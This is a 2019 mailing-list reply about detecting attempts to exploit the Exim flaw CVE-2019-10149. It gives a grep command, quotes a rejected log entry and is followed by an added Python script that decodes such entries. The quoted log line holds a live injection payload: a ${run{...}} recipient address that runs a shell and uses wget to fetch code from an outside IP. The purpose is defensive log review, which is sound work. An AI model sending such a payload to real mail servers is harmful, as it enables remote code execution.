
Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.



	Hi.

On Fri, Jun 21, 2019 at 05:45:27AM +1000, Andrew McGlashan wrote:
> On 21/6/19 4:49 am, Reco wrote:
> >> Thank you, I've changed the banner for now.... let's hope that
> >> lessens the problem.
> > 
> > Please share the results if possible.
> > 
> > On this particular MTA I've counted a whopping 4 attempts to exploit
> > CVE-2019-10149 so far. One made from France, three from US. I'm
> > kind of disappointed, I've expected half a million Chinese and
> > Russian bots at least ;)
> 
> I've got good logs, what is the easiest string to grep for in the logs
> to see attempts? Or have you got a more fancy solution?

Plain old grep is more than enough here.
This one:

grep 'run{' /var/log/exim4/reject*

finds things like these:

2019-06-19 18:54:43 H=(service.com) [107.182.225.42] F=<support@service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.xxx.xxx.xxx\x22}}@localhost>: Unrouteable address

Reco
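
Added example, not part of the original message: a Python version of the grep above that parses reject-log lines of the shape shown, decodes the \xHH and \t escapes inside the ${run{...}} recipient for review, and counts attempts per source address. The sample log lines and their addresses are constructed, and the function names are hypothetical.

```python
import re
from collections import Counter

# Reject-log line shape from the message: "<ts> H=... [ip] F=<..> rejected RCPT <rcpt>: reason"
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) '
    r'H=.*?\[(?P<ip>[0-9A-Fa-f.:]+)\].*?'
    r'rejected RCPT <(?P<rcpt>.*)>: (?P<reason>.*)$'
)
RUN_RE = re.compile(r'\$\{run\{(?P<cmd>.*?)\}\}')
ESCAPE_RE = re.compile(r'\\(x[0-9A-Fa-f]{2}|t|n)')

def decode_escapes(text):
    # Single pass over \xHH, \t and \n; whitespace escapes become a space.
    def repl(m):
        tok = m.group(1)
        return chr(int(tok[1:], 16)) if tok[0] == 'x' else ' '
    return ESCAPE_RE.sub(repl, text)

def find_attempts(lines):
    # One record per rejected RCPT whose address contains 'run{' (same marker as the grep).
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or 'run{' not in m.group('rcpt'):
            continue
        run = RUN_RE.search(m.group('rcpt'))
        hits.append({
            'ts': m.group('ts'),
            'ip': m.group('ip'),
            'command': decode_escapes(run.group('cmd')) if run else None,
            'reason': m.group('reason'),
        })
    return hits

def attempts_per_source(hits):
    return Counter(h['ip'] for h in hits)

# Constructed sample lines (documentation-range addresses, harmless commands).
SAMPLE_LOG = r"""
2019-06-19 18:54:43 H=(mail.example.net) [192.0.2.10] F=<support@example.net> rejected RCPT <root+${run{\x2Fbin\x2Ftrue\t--constructed}}@localhost>: Unrouteable address
2019-06-19 19:02:11 H=(mail.example.net) [192.0.2.10] F=<support@example.net> rejected RCPT <root+${run{\x2Fbin\x2Ftrue}}@localhost>: Unrouteable address
2019-06-20 03:17:05 H=(host.example.org) [198.51.100.7] F=<x@example.org> rejected RCPT <root+${run{\x2Fbin\x2Ffalse}}@localhost>: Unrouteable address
2019-06-20 04:00:00 H=(other.example.com) [203.0.113.5] F=<user@example.com> rejected RCPT <someone@example.org>: relay not permitted
"""

if __name__ == '__main__':
    hits = find_attempts(SAMPLE_LOG.splitlines())
    for h in hits:
        print(h['ts'], h['ip'], repr(h['command']), h['reason'])
    print(attempts_per_source(hits).most_common())
```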

